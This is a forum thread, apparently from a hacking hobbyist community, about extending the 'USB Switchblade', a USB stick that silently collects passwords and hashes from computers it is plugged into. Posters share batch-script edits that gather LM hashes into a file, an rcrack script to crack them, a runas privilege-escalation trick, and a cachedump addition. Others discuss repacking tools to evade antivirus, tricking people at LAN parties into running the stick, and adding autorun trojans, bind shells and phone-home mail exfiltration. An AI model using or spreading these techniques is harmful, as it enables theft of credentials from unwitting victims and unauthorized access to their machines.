USB Switchblade Development Options

[Guest_MaxDamage_*]

...

[DLSS]

ok so here's avast's output and the warning/info/advice it gives

it gives following warnings with following files :

file : batexemailpv.exe[UPX]
Malware name : Win32:MailPassView [Tool]
Malware type : Other potentially dangerous program
VPS version : 0636-1, 06/09/2006
recommended action : move to chest

file : batexemspass.exe[UPX]
Malware name : Win32:Messen [Tool]
Malware type : Other potentially dangerous program
VPS version : 0636-1, 06/09/2006
recommended action : move to chest

[brainkill]

ok so here's avast's output and the warning/info/advice it gives

it gives following warnings with following files :

file : batexemailpv.exe[UPX]
Malware name : Win32:MailPassView [Tool]
Malware type : Other potentially dangerous program
VPS version : 0636-1, 06/09/2006
recommended action : move to chest

file : batexemspass.exe[UPX]
Malware name : Win32:Messen [Tool]
Malware type : Other potentially dangerous program
VPS version : 0636-1, 06/09/2006
recommended action : move to chest

I must have the original programs... before the were encrypted in UPX in order to encrypt them fully. Thanks

[marlasinger]

Hey all,

The symantec anti virus auto-protect is showing up. I used brainkill's version of pwdump and pwservice.exe and LsaExt.dll. I have no problems with pwservice or pwdump, but LsaExt.dll is getting auto-quarenteened. Pspv.exe is getting nailed as well. The good news is that I god mspass.exe working and it logs chat user/pass combos in plaintext. I plan on adding outlook and other mail support as well. Any suggestions for LsaExt.dll and pspv.exe? TIA

Marla :zombie:

[Ouroboros]

I asked on Digg, but didn't get an answer so I am asking at the source.


Is there a particular reason why the U3 ISO image is being replaced with a custom ISO image?

Since the U3 launchpad is a real application (backed by big corporations so antivirus is much less likely to block it), which already has the ability to autolaunch an application registered to it, why not go that route? All it takes is the U3 developer API (available for free), some tweaking to an exe to behave as U3 expects, and packing it up as a U3 install file. To prevent easy tagging by antivirus, randomly pad the exe before creation the U3 install file. Since U3 always had the ability to load up from a local U3 install file, this is relatively easy to test.

I realize a lot of batch files are being used, but a simple exe to execute batch files shouldn't be a problem, right?

I don't see a clear advantage to using the custom ISO. Am I missing something?

[PoyBoy]

I was thinking that too. I like my skype! dammit! and sudoku. and trillian. and firefox. and thunderbird, etc

I like your idea

EDIT: It aslo seems lots cleaner to just use the original interface, with a package

[silivrenion]

A small modification can be made that will allow someone to easily create a file of lm password hashes alongside the usual machine output.

The benefit? Well, lets say someone wanted to go to several computers, and wanted to grab a long list of passwords to crack in one fell swoop. Copying and pasting from all of the individual log files would be tedious to create an lm hash list, so why not create it on the fly?

edit your switchblade batch file so that at the bottom, you see this. Also, note that your switchblade file might not have the URL history, depending on the version you chose. Pay attention to the line that starts with TYPE.

CODE

... [continued from file] ...



Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

echo ***********[Dump URL History]******* >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   cscript //nologo .DUH.vbs >> Documentslogfiles%computername%.log 2>&1

TYPE Documentslogfiles%computername%.log | find ":::" | find /V "NO PASSWORD" | find /V "HelpAssistant" >> Documentslogfilespwfile.txt

:End

exit

Pay special attention to the line that starts with TYPE. Lets go through it one by one.

CODE

TYPE Documentslogfiles%computername%.log

This will get the output we just created with switchblade, so we can work with it.

CODE

find ":::"

I noticed all of the lm hashes had three colons in their lines, which appeared no where else. Might aswell use that to our advantage!

CODE

find /V "NO PASSWORD" | find /V "HelpAssistant"

There's two types of lines that we don't want to see, ones that have no password to crack, and those that are of the Microsoft created account "HelpAssistant". If there's other search terms you don't want to see, you can add them also.

CODE

>> Documentslogfilespwfile.txt

This will create a password file if it doesnt exist. If it does exist, the password file will be appended to, so that you can rapidly gather passwords into one file for quick cracking.... which can be done with the next small code edit


Making rcrack one-click friendly

use notepad to create the following file, and save it as crack.bat or something with a batch extension. This will be saved on your cracking computer at home that contains your rainbow tables. Hopefully you don't bring those with you on your USB key!!! :o

CODE

@echo off

echo Starting crack, writing output to log.txt ...

echo   >> log.txt

echo ************************************ >> log.txt

echo Cracking started by %username% at %date% %time%  >> log.txt

rcrack.exe *.rt -f pwfile.txt >> log.txt

echo Cracking complete at %date% %time% >> log.txt

echo ************************************ >> log.txt

echo Success!

this batch file will process your password file you created, and output the status of it to log.txt in your cracking folder. This way you can leave your computer cracking unattended, and still be able to get the results later in an organized manner, with all of your passwords you gathered in one neat and convenient location.

[Deus]

I am using Amish's Solution but when I plug in the USB drive I get the pop up window askinf what I want to do. I fI choose "Open Files on Folder" then it runs fine. How do I get it to run without the window popping up?

[nachtfrau]

Since we are on the subject of "physical" access to someone's box and some utilities to use, why not use "Hirens Boot CD"? A very powerful, yet simple array of tools all tossed into a nice little neat package.

I know it's off subject and it's very "nubish" utility yet it works and has a bunch of great tools which I use on a daily basis. Although it doesn't crack the password and give you the hash, yet it will reset the password for you with a few keyboard strokes. Badda-bing Badda-boom your in the box with Administrator access.

I have not yet found a windows machine it doesn't work on. Only drawback would be that if someone has a CMOS/BIOS password on the box and you wouldn't be able to access the BIOS without providing a password or removing the battery to reset the BIOS back to default settings.

Just a thought...

[Darren Kitchen]

I havent read pages 3 & 4 yet but someone on IRC asked for a link to the tables so lemme get that out there.

Rainbow Tables:
http://rainbowtables.shmoo.com/

Gotta love the shmoo group!

[spektormax]

hey, I made a very small modification to the stick.
First of all I'm using his at school, but I magicly got the admin password *cough ophcrack* so I have moddified to run a batch file (I have a U3 but I dont use the U3 method scince u'd need to have the admin privalges).
Heres my modified Batch:

CODE

cd WIPCMD

runas /user:Administrator go.cmd < admin.txt

What this does is basicly perform the Windows XP/2000 command which runs a program as a diffrent user, and tell it to run the same go.cmd file except as administrator. The admin.txt file simply contains the password to log in as.
The secound slight modification that I made is I added cachedump to the list of things to run. Cachedump will basicly do what pwdump2 does on the local computer execpt it steals the cached Domain credencials. I wasn't sure wether or not it trip some virus scanners (tired the normal one with NOD32 and it didn't but who knows) so I used "the brainkill method" of making it undetectable, The original file is here: http://www.off-by-one.net/misc/cachedump-1.2.zip heres the one that is totaly undetectable: http://unpluggedpodcast.com/spektormax/cachedump.exe Irongeek has a nice tutorial on using cachedump as well as how to crack it with a moddified version of Jhon the Ripper or a semi-hack for cain&abel here: http://www.irongeek.com/i.php?page=security/cachecrack
Heres my slightly moddified go.cmd file that makes the cachedump results look nice:

CODE

... [continued from file] ...

echo ***********[Dump URL History]******* >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   cscript //nologo .DUH.vbs >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

echo ***************[MS-CACHE]*********** >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   .cachedump.exe >> Documentslogfiles%computername%.log 2>&1

:End

exit

[Darren Kitchen]

Since we are on the subject of "physical" access to someone's box and some utilities to use, why not use "Hirens Boot CD"? A very powerful, yet simple array of tools all tossed into a nice little neat package.

I know it's off subject and it's very "nubish" utility yet it works and has a bunch of great tools which I use on a daily basis. Although it doesn't crack the password and give you the hash, yet it will reset the password for you with a few keyboard strokes. Badda-bing Badda-boom your in the box with Administrator access.

I have not yet found a windows machine it doesn't work on. Only drawback would be that if someone has a CMOS/BIOS password on the box and you wouldn't be able to access the BIOS without providing a password or removing the battery to reset the BIOS back to default settings.

Just a thought...

We've got something in the works. All I'll say. But thats another hack entirely. The idea behind this hack is that you can be at a LAN Party, hand it to someone and say "Oh, I've got the latest game patches on here" or "hey think i could get a copy of that album / expense report template / pr0n" and bingo, you got them to hack themselves.

[psichonico]

I just tried Amish's version of the switchblade and im just wondering why is there no PWDump and also will PWDump be accessbile soon

[DLSS]

Since we are on the subject of "physical" access to someone's box and some utilities to use, why not use "Hirens Boot CD"? A very powerful, yet simple array of tools all tossed into a nice little neat package.

I know it's off subject and it's very "nubish" utility yet it works and has a bunch of great tools which I use on a daily basis. Although it doesn't crack the password and give you the hash, yet it will reset the password for you with a few keyboard strokes. Badda-bing Badda-boom your in the box with Administrator access.

I have not yet found a windows machine it doesn't work on. Only drawback would be that if someone has a CMOS/BIOS password on the box and you wouldn't be able to access the BIOS without providing a password or removing the battery to reset the BIOS back to default settings.

Just a thought...

We've got something in the works. All I'll say. But thats another hack entirely. The idea behind this hack is that you can be at a LAN Party, hand it to someone and say "Oh, I've got the latest game patches on here" or "hey think i could get a copy of that album / expense report template / pr0n" and bingo, you got them to hack themselves.

in that method would it not just be easy to put a packaged trojan (like one of my fav's cia 1.3 (a classic :D) and autorun it ?
those also have future's like when connected to the net connect to .... .no-ip.com etc , u can even get it to mail u the ip adress when someone gets online .... and it dont get detected -> see http://hak5.org/forums/viewtopic.php?p=30398

[Loony Guitarist]

You can get more programs that you can put into the script from www.nirsoft.net

Is there a program that will grab the lm hashes for this? I couldint find one on there site.
The other programs work like a charm though almost scary. it even grabed my gmail account and password.

[SomeoneE1se]

I think we are going to need two diffrent payloads, one stealth and one pwner.. If you have someone who is tight into securty and they see a account created, or a somthing droped on their computer you're boned because now their pissed and looking for you. But if you only take stuff off the computer there should be really no way to tell...

[Guest_MaxDamage_*]

...

[SomeoneE1se]

Hey all

When I put together the proof of concept U3 hack I wasn’t thinking it would get much attention so it is a bit primitive and kind of script kiddie. I gave it to Darren to see what he thought. I didn’t realise it would be so much fun to talk about and see Darren demo.

So I was thinking, How about we re-write it a bit better this time. I think it would be quite cool to evolve it a bit.

Some suggestions:

Works on U3 and USB
Automatic privilege escalation from any user to Admin
A real bind shell as well as the account adding and hiding.
Re-compile pwdump4 with new variables so none of the virus checkers find it.
A phone home option that can detect or create an SMTP server to send the results.
A switch to make it a passive as apposed to active hack.
Improve stealth and speed
Give it the ability to run bolt on’s such as anything you guys can think of.
An automated switchblade build routine.

And so on…… Hmmm maybe my black hat is showing sorry. :oops:

OK, back to gray.

It might be fun to do it together with all the skills we have we could make an awesome tool.

I have already written some of the above and am happy to share.

My only reservation is I don’t want this to tun into a real work type project. Just a bit of fun that mabe we could develop something that could be used in another segment.

What do you guys think?

_________________
MaxDamage
Max's Law: "Murphy was an Optimist!"

I'm with you.... and a way to switch it from passive to active and then back would really be helpful (sadly I know just about nothing about this but I'd love to help so if you can recomend some reading to bring my 1337 skillz up to where they need to be, that would be great meanwile off to google)

... murphy was totaly an optimist

[spudgun_uk]

Anyone else getting this?

It's picking up everything else, it's picking up whoever logged in lasts password, (i'm currently testing it out on my home network, I've tried on 2 boxes and am getting the same error), although it's not giving passwords for all accounts. I'm running the one which is intended for the U3, but just running directly off a STANDARD usb stick. Is this why I'm getting the error? The other hack doesn't seem to have a password grabber.. or account escalation facility.. Sorry to sound so n00b ;)

Hope someone can help ...
-Kyle

[nachtfrau]

We've got something in the works. All I'll say. But thats another hack entirely. The idea behind this hack is that you can be at a LAN Party, hand it to someone and say "Oh, I've got the latest game patches on here" or "hey think i could get a copy of that album / expense report template / pr0n" and bingo, you got them to hack themselves.

I understand the concept completly. It was just another suggestion to try if you really don't need/want the password to the box your trying to pwn. I just like to give alternatives to the same solution.

Just trying to help :D